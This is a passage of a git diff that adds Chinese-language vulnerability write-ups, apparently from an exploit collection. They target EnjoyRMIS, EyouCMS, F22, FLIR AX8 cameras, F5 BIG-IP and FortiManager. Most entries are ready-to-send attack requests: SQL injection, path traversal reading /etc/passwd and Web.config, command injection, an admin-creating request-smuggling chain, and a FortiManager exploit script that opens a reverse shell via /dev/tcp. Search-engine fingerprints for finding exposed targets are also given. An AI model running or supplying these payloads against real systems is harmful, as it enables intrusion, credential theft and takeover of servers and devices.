+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCpById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCpById xmlns="http://tempuri.org/">
+      <sId>string</sId>
+    </GetOCpById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700645126934-9d93850e-de88-4f90-8152-f31c638c3f10.png](./img/7G5cfT60yTl1WE3D/1700645126934-9d93850e-de88-4f90-8152-f31c638c3f10-995088.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cz8ou2w7wpwho4p8>
\ No newline at end of file
diff --git a/EnjoyRMISGetODById存在SQL注入漏洞.md b/EnjoyRMISGetODById存在SQL注入漏洞.md
new file mode 100644
index 0000000..9fbda4d
--- /dev/null
+++ b/EnjoyRMISGetODById存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetODById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetODById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/EoBtxnlAiXH-mJkc/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-021809.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetODById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetODById xmlns="http://tempuri.org/">
+      <sId>string' AND 8733 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8733=8733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113))) AND 'atoN'='atoN</sId>
+    </GetODById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700645309721-be2c91f3-6e6d-4708-a6b9-f1ba12fd61da.png](./img/EoBtxnlAiXH-mJkc/1700645309721-be2c91f3-6e6d-4708-a6b9-f1ba12fd61da-760939.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetODById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetODById xmlns="http://tempuri.org/">
+      <sId>string</sId>
+    </GetODById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700645332683-1eb00249-966d-49ac-9671-ef88f1c65b79.png](./img/EoBtxnlAiXH-mJkc/1700645332683-1eb00249-966d-49ac-9671-ef88f1c65b79-775568.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gryk74nk6kv4hgoh>
\ No newline at end of file
diff --git a/EnjoyRMISGetOSpById存在SQL注入漏洞.md b/EnjoyRMISGetOSpById存在SQL注入漏洞.md
new file mode 100644
index 0000000..1e783fe
--- /dev/null
+++ b/EnjoyRMISGetOSpById存在SQL注入漏洞.md
@@ -0,0 +1,42 @@
+# EnjoyRMIS GetOSpById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/OEK9tkHunYY08in-/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-970499.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOSpById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOSpById xmlns="http://tempuri.org/">
+      <sId>string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj</sId>
+    </GetOSpById>
+  </soap:Body>
+</soap:Envelope> 
+```
+
+![1700576430999-14827fbf-6822-4dd6-a406-10bab39365a4.png](./img/OEK9tkHunYY08in-/1700576430999-14827fbf-6822-4dd6-a406-10bab39365a4-024610.png)
+
+sqlmap
+
+![1700576440841-41c461df-14f0-4f7d-92c9-eb8d6faa0e2b.png](./img/OEK9tkHunYY08in-/1700576440841-41c461df-14f0-4f7d-92c9-eb8d6faa0e2b-231689.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zpzm4hme69hpf525>
\ No newline at end of file
diff --git a/EyouCMS文件包含RCE漏洞.md b/EyouCMS文件包含RCE漏洞.md
new file mode 100644
index 0000000..a405ee7
--- /dev/null
+++ b/EyouCMS文件包含RCE漏洞.md
@@ -0,0 +1,73 @@
+## EyouCMS文件包含RCE漏洞
+
+First, download the latest source code from the official website:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736654.png)
+After downloading, use PHPStudy Pro to set up the website:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736275.png)
+Proceed with the installation process, setting up the database information and admin password:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736805.png)
+In the admin panel, verify that the current version is the latest:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736228.png)
+Prepare a malicious payload in the form of an image, utilizing Remote Code Execution (RCE) via template file inclusion:
+
+```
+GIF89a
+<?php phpinfo();?>
+```
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736384.png)
+Upload the image payload:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736923.png)
+Choose the WeChat public account interface:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736602.png)
+Proceed with the upload and obtain the returned path:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736696.png)
+
+```
+uploads/allimg/20230901/1-230Z1151QR14.gif
+```
+Return to the template configuration, set up security questions:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736323.png)
+After configuring security questions, edit the "index.htm" template under the PC section:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737706.png)Input the following payload:
+
+```
+{eyou:include file="uploads/allimg/20230901/1-230Z1151QR14.gif" /}
+```
+Append it at the end:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737598.png)
+After submission:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737557.png)
+Return to the homepage, where arbitrary code execution can be observed:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737266.png)
+
+## Code Audit
+Firstly, the `eyou:include` tag is present in the list of parsed tags, and there is no filtering mechanism applied to it:
+```
+core\library\think\Template.php
+```
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737623.png)
+The template file "index.htm" is read and stored in the `$content` variable. Parsing takes place in "core\library\think\Template.php":![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737286.png)
+We can observe the `parseEyouInclude` function:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737366.png)
+Inside this function, the template is analyzed and processed, where we can see that only string operations are performed, and no security risk evaluation is conducted:![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737380.png)
+Finally, at the end, the tags are replaced and returned:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737460.png)
+Due to the absence of security filtering, the include tag's parsing result directly reads and replaces content:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737841.png)
+Similarly, in the "Template.php" file, writing to the cache occurs:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737357.png)
+Digging deeper:
+
+```
+core\library\think\template\driver\File.php
+```
+In the `write` method, content is directly written:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737034.png)
+Cache directory:
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737865.png)
+Ultimately, in the `read` method of "File.php," the temporarily generated file is included, leading to Remote Code Execution (RCE):
+
+```
+core\library\think\template\driver\File.php
+```
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061738568.png)
\ No newline at end of file
diff --git a/F22服装管理软件系统Load存在任意文件读取漏洞.md b/F22服装管理软件系统Load存在任意文件读取漏洞.md
new file mode 100644
index 0000000..159cdae
--- /dev/null
+++ b/F22服装管理软件系统Load存在任意文件读取漏洞.md
@@ -0,0 +1,23 @@
+# F22服装管理软件系统Load存在任意文件读取漏洞
+广州锦铭泰软件科技有限公司开发的F22服装管理软件系统Load存在任意文件读取漏洞
+
+## fofa
+```javascript
+body="F22WEB登陆"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730457537214-4b469bb6-9e58-4a78-a265-a4af3a533914.png)
+
+## poc
+```java
+GET /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../Web.config HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730457891046-7fb9c455-fe97-49e6-b36e-a737c0d4719e.png)
+
diff --git a/F5-BIG-IP-远程代码执行漏洞(CVE-2023-46747).md b/F5-BIG-IP-远程代码执行漏洞(CVE-2023-46747).md
new file mode 100644
index 0000000..2c363d6
--- /dev/null
+++ b/F5-BIG-IP-远程代码执行漏洞(CVE-2023-46747).md
@@ -0,0 +1,106 @@
+## F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)
+
+## 漏洞描述
+
+**F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)**，未经授权的远程攻击者通过管理端口或自身IP地址访问BIG-IP系统，利用此漏洞可能绕过身份认证，导致在暴露流量管理用户界面（TMUI）的 F5 BIG-IP 实例上执行任意代码。
+
+## 影响版本
+
+```
+F5 BIG-IP <= 17.1.0
+16.1.0 <= F5 BIG-IP <= 16.1.4
+15.1.0 <= F5 BIG-IP <= 15.1.10
+14.1.0 <= F5 BIG-IP <= 14.1.5
+13.1.0 <= F5 BIG-IP <= 13.1.5
+```
+
+## 环境下载
+
+```
+https://my.f5.com/manage/s/downloads?productFamily=BIG-IP&productLine=big-ip_v15.x&version=15.1.8&container=Virtual-Edition&files=BIGIP-15.1.8-0.0.7.ALL-vmware.ova&locations=JAPAN
+
+链接：https://pan.baidu.com/s/1zLMXJCKtZtzIxCQGoxwPgg 
+提取码：ksdn 
+```
+
+搭建方式很简单，下载BIGIP-15.1.8-0.0.7.ALL-vmware.ova，接着用vm打开ova即可
+
+搭建过程 [F5 WMware虚拟机环境搭建-BIG-IP Virtual Edition 11.3.0-CSDN博客](https://blog.csdn.net/ice_age1/article/details/49998059)
+
+重置web密码
+
+```
+进入tmsh模式 敲击
+modify auth user admin password admin
+```
+
+搭建成功页面
+
+
+
+## 漏洞复现
+
+### 第一步 发送 TMUI模块的请求
+
+当发送到F5 BIG-IP TMUI模块的请求（例如登陆页面/tmui/login.jsp）中，包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头，并且请求体内容满足特定内容时，漏洞会被触发。
+
+&name=adminqq&name_before=&passwd=admin789456 参数填入创建账户
+
+```
+POST /tmui/login.jsp HTTP/1.1
+Host: 192.168.127.146
+Content-Type: application/x-www-form-urlencoded
+
+
+204		
+HTTP/1.1/tmui/Control/form	127.0.0.1	localhost	localhostPTmui-DubbufBBBBBBBBBBB
+REMOTEROLE
0�	localhostadmin
q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=adminqq&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=�
+0
+```
+
+![](./assets/20231031212344495.png)
+
+
+
+### 第二步 获取用户token
+
+```
+POST /mgmt/shared/authn/login HTTP/1.1
+Host: 192.168.127.146
+Content-Length: 22
+Content-Type: application/x-www-form-urlencoded
+
+ {"username":"admin", "password":"admin789456"}
+```
+
+![](./assets/20231031212450387.png)
+
+
+
+### 第三步 执行命令
+
+将获取到得token带入`X-F5-Auth-Token`中，在通过`/mgmt/tm/util/bash` 执行命令
+
+```
+POST /mgmt/tm/util/bash HTTP/1.1
+Host: 192.168.127.146
+Connection: keep-alive
+Content-Length: 22
+X-F5-Auth-Token:ICGZXJJROASFRPWYZF3EAQFCGN
+
+ {"command":"run","utilCmdArgs":"-c whoami"}
+```
+
+![](./assets/20231031212657529.png)
+
+
+
+### 参考链接
+
+```
+https://mp.weixin.qq.com/s/iN7rlJJaI4sl-fiL0eMXsQ
+https://github.com/projectdiscovery/nuclei-templates/blob/56d79688e0d2ebce5b8939961946f4f32e663700/http/cves/2023/CVE-2023-46747.yaml
+https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg
+https://blog.csdn.net/ice_age1/article/details/49998059
+```
+
diff --git a/FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞.md b/FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞.md
new file mode 100644
index 0000000..e3b8d60
--- /dev/null
+++ b/FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞.md
@@ -0,0 +1,25 @@
+# FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞
+
+FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞，允许攻击者在目标服务器上执行任意系统命令，可能导致服务器被完全控制、数据泄露或破坏，严重威胁系统安全。
+
+## hunter
+
+```javascript
+web.icon=="f4370ff0b4763e18159cd7cdf36a4542"
+```
+
+## poc
+
+```javascript
+GET /settings/applyfirmware/;id>123457.txt;/false HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ******
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+```
+
diff --git a/FLIR-AX8热成像仪download.php存在任意文件读取漏洞.md b/FLIR-AX8热成像仪download.php存在任意文件读取漏洞.md
new file mode 100644
index 0000000..02188ce
--- /dev/null
+++ b/FLIR-AX8热成像仪download.php存在任意文件读取漏洞.md
@@ -0,0 +1,30 @@
+# FLIR-AX8热成像仪download.php存在任意文件读取漏洞
+
+FLIR-AX8热成像仪download.php存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## hunter
+
+```javascript
+web.icon=="f4370ff0b4763e18159cd7cdf36a4542"
+```
+
+## poc
+
+```javascript
+POST /download.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ****
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 24
+
+file=../../../etc/passwd
+```
+
+![image-20240927202649846](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272026907.png)
diff --git a/FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md b/FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md
new file mode 100644
index 0000000..c285dc7
--- /dev/null
+++ b/FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md
@@ -0,0 +1,30 @@
+# FLIR-AX8热成像仪palette.php存在远程命令执行漏洞
+
+FLIR-AX8热成像仪palette.php存在远程命令执行漏洞，允许攻击者在目标服务器上执行任意系统命令，可能导致服务器被完全控制、数据泄露或破坏，严重威胁系统安全。
+
+## hunter
+
+```javascript
+web.icon=="f4370ff0b4763e18159cd7cdf36a4542"
+```
+
+## poc
+
+```javascript
+POST /palette.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ****
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 19
+
+palette=;id>66.txt;
+```
+
+![image-20240927202542338](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272025400.png)
diff --git a/FLIR-AX8热成像仪res.php存在远程命令执行漏洞.md b/FLIR-AX8热成像仪res.php存在远程命令执行漏洞.md
new file mode 100644
index 0000000..a0de118
--- /dev/null
+++ b/FLIR-AX8热成像仪res.php存在远程命令执行漏洞.md
@@ -0,0 +1,29 @@
+# FLIR-AX8热成像仪res.php存在远程命令执行漏洞
+
+FLIR-AX8热成像仪res.php存在远程命令执行漏洞，允许攻击者在目标服务器上执行任意系统命令，可能导致服务器被完全控制、数据泄露或破坏，严重威胁系统安全。
+
+## hunter
+
+```javascript
+web.icon=="f4370ff0b4763e18159cd7cdf36a4542"
+```
+
+## poc
+
+```javascript
+POST /res.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: *****
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 67
+
+action=node&resource=1;pwd
+```
+
+![image-20240927202446271](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272024333.png)
diff --git a/FLIR-AX8热成像仪res.php远程命令执行漏洞（CVE-2022-37061）.md b/FLIR-AX8热成像仪res.php远程命令执行漏洞（CVE-2022-37061）.md
new file mode 100644
index 0000000..09aca39
--- /dev/null
+++ b/FLIR-AX8热成像仪res.php远程命令执行漏洞（CVE-2022-37061）.md
@@ -0,0 +1,37 @@
+# FLIR-AX8热成像仪res.php远程命令执行漏洞（CVE-2022-37061）
+
+# 一、漏洞简介
+FLIR-AX8是美国菲力尔公司（Teledyne FLIR）旗下的一款工业红外热像仪AX8，英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术，通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统，将创新的传感解决方案带入日常生活中，广泛服务于政府与国防、工业和商业市场。FLIR AX8 版本 1.46.16 及以下未经身份验证的远程操作系统命令注入漏洞。res.php 页面中的 id 参数可以通过命令拼接，以 root 用户身份注入和执行任意 shell 命令，成功的利用可能允许攻击者以 root 权限在底层操作系统上执行任意命令。
+
+# 二、影响版本
++ FLIR-AX8 1.46.16及以下
+
+# 三、资产测绘
++ hunter`web.icon=="f4370ff0b4763e18159cd7cdf36a4542"`
++ 登录页面
+
+![1694186568199-799956f5-3035-4a87-903e-1f67c1769f8b.png](./img/iXVn8Cpt4z6Nrh1L/1694186568199-799956f5-3035-4a87-903e-1f67c1769f8b-274172.png)
+
+# 四、漏洞复现
+```plain
+POST /res.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: theme=light; distanceUnit=metric; temperatureUnit=celsius; showCameraId=false; clientTimeZoneOffset=-480; clientTimeZoneDST=0; PHPSESSID=8ff0e4065c8a04d1894ddde494f0fe8d
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+
+action=node&resource=1;id
+```
+
+![1694186735678-95a1cc2e-58c0-47de-b006-fa265dae6848.png](./img/iXVn8Cpt4z6Nrh1L/1694186735678-95a1cc2e-58c0-47de-b006-fa265dae6848-356757.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/afi319vymbd33bg3>
\ No newline at end of file
diff --git a/FortiManager身份认证绕过漏洞(CVE-2024-47575).md b/FortiManager身份认证绕过漏洞(CVE-2024-47575).md
new file mode 100644
index 0000000..9137d0e
--- /dev/null
+++ b/FortiManager身份认证绕过漏洞(CVE-2024-47575).md
@@ -0,0 +1,257 @@
+# FortiManager身份认证绕过漏洞(CVE-2024-47575)
+
+**Fortinet FortiManager 身份认证绕过漏洞(CVE-2024-47575)**，未经身份验证的远程攻击者可以使用有效的 FortiGate 证书在 FortiManager 中注册未经授权的设备。成功利用漏洞后攻击者将能够查看和修改文件（例如配置文件）以获取敏感信息，并能够管理其他设备执行任意代码或命令。
+
+## **影响版本**
+
+7.6.0 <= FortiManager 7.6.* <= 7.6.0
+
+7.4.0 <= FortiManager 7.4.* <= 7.4.4
+
+7.2.0 <= FortiManager 7.2.* <= 7.2.7
+
+7.0.0 <= FortiManager 7.0.* <= 7.0.12
+
+6.4.0 <= FortiManager 6.4.* <= 6.4.14
+
+6.2.0 <= FortiManager 6.2.* <= 6.2.12
+
+7.4.1 <= FortiManager Cloud 7.4.* <= 7.4.4
+
+7.2.1 <= FortiManager Cloud 7.2.* <= 7.2.7
+
+7.0.1 <= FortiManager Cloud 7.0.* <= 7.0.12
+
+FortiManager Cloud 6.4.*
+
+## poc
+
+脚本来源 https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575
+
+```python
+import socket
+import struct
+import ssl
+import argparse
+import random
+from time import sleep
+
+
+
+banner = """			 __         ___  ___________                   
+	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
+	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
+	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
+	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
+				  \\/          \\/     \\/                            
+
+        CVE-2024-47575.py
+        (*) FortiManager Unauthenticated Remote Code Execution (CVE-2024-47575) exploit by watchTowr
+        
+          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
+
+        CVEs: [CVE-2024-47575]
+"""
+
+
+print(banner)
+parser = argparse.ArgumentParser(description='FortiManager CVE-2024-47575 exploit')
+parser.add_argument('--target', type=str, help='Target IP', required=True)
+parser.add_argument('--lhost', type=str, help='attacker IP', required=False, default='empty')
+parser.add_argument('--lport', type=str, help='attacker PORT', required=False, default='empty')
+parser.add_argument('--action', type=str, choices=['check', 'exploit'], help='Choose an action: "check" or "exploit"', required=True)
+args = parser.parse_args()
+
+
+
+if(args.action == "exploit"):
+    if(args.lhost == 'empty' or args.lport == 'empty'):
+        print("[ERROR] you got an error, because you chose the 'exploit' mode but didnt provide the '--lhost and --lport'")
+        exit(1)
+
+
+# print("[DEBUG] go and run the following command on your fortimanager -> tail -f /var/log/fdssvrd.log")
+# input("press enter to continue")
+
+
+request_getip = b"""get ip
+serialno=FGVMEVWG8YMT3R63
+mgmtid=00000000-0000-0000-0000-000000000000
+platform=FortiGate-VM64
+fos_ver=700
+minor=2
+patch=2
+build=1255
+branch=1255
+maxvdom=2
+fg_ip=192.168.1.53
+hostname=FGVMEVWG8YMT3R63
+harddisk=yes
+biover=04000002
+harddisk_size=30720
+logdisk_size=30235
+mgmt_mode=normal
+enc_flags=0
+first_fmgid=
+probe_mode=yes
+vdom=root
+intf=port1
+\0""".replace(b"\n",b"\r\n")
+
+
+
+request_auth=b"""get auth
+serialno=FGVMEVWG8YMT3R63
+mgmtid=00000000-0000-0000-0000-000000000000
+platform=FortiGate-60E
+fos_ver=700
+minor=2
+patch=4
+build=1396
+branch=1396
+maxvdom=2
+fg_ip=192.168.1.53
+hostname=FortiGate
+harddisk=yes
+biover=04000002
+harddisk_size=30720
+logdisk_size=30107
+mgmt_mode=normal
+enc_flags=0
+mgmtip=192.168.1.53
+mgmtport=443
+\0""".replace(b"\n",b"\r\n")
+
+
+
+
+request_file_exchange = b"""get file_exchange
+localid=REPLACE_LOCAL_ID
+chan_window_sz=32768
+deflate=gzip
+file_exch_cmd=put_json_cmd
+
+\0""".replace(b"\n", b"\r\n").replace(b"REPLACE_LOCAL_ID", str(random.randint(100,999)).encode())
+
+json_payload = b"""{
+    "method": "exec",
+    "id": 1,
+    "params": [
+        {
+            "url": "um/som/export",
+            "data": {
+               "file":"`sh -i >& /dev/tcp/REPLACE_LHOST/REPLACE_LPORT 0>&1`"
+            }
+        }
+    ]
+}""".replace(b"REPLACE_LHOST", args.lhost.encode()).replace(b"REPLACE_LPORT", args.lport.encode())
+request_channel_open = b"""channel
+remoteid=REPLACE_REMOTE_ID
+
+\0""".replace(b"\n", b"\r\n")
+
+request_channel_open += str(len(json_payload)).encode()
+request_channel_open += b"\n"
+request_channel_open += json_payload
+request_channel_open += b"0\n"
+
+
+request_channel_close = b"""channel
+action=close
+remoteid=REPLACE_REMOTE_ID
+
+\0""".replace(b"\n", b"\r\n")
+
+
+def sendmsg(socket, request, recv=True):
+    message=struct.pack(">II", 0x36e01100, len(request)+8)+request
+    socket.send(message)
+    if(not recv):
+        return
+    hdr=socket.read(8)
+    if len(hdr)!=8:
+        return hdr
+    magic, size=struct.unpack(">II", socket.read(8))
+    return socket.read(size)
+
+
+def create_ssl_sock():
+    context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+    context.load_cert_chain(certfile="w00t_cert.bin", keyfile="w00t_key.bin")  # Load the certificate and key
+    context.check_hostname = False
+    context.verify_mode = ssl.CERT_NONE
+
+    s = socket.create_connection(host, 30)
+    ssl_sock = context.wrap_socket(s)
+    return ssl_sock
+
+def print_n_sleep(msg, s=0.4):
+    print(msg)
+    sleep(s)
+
+host = (args.target, 541)
+
+ssl_sock = create_ssl_sock()
+
+
+response= sendmsg(ssl_sock, request_getip)
+# print(response)
+
+
+
+response= sendmsg(ssl_sock, request_auth)
+# print(response)
+
+
+
+response = sendmsg(ssl_sock, request_file_exchange)
+remote_id = response.decode().split('\r\n')[1].split('=')[1].strip()
+
+if(remote_id !=None):
+    print(f"[VULN] Target is Vulnerable")
+else:
+    print(f"[SAFE] Target is Safe")
+    exit(1)
+
+if(args.action == "check"):
+    exit(1)
+
+
+request_channel_open = request_channel_open.replace(b"REPLACE_REMOTE_ID", remote_id.encode())
+response = sendmsg(ssl_sock, request_channel_open, False)
+
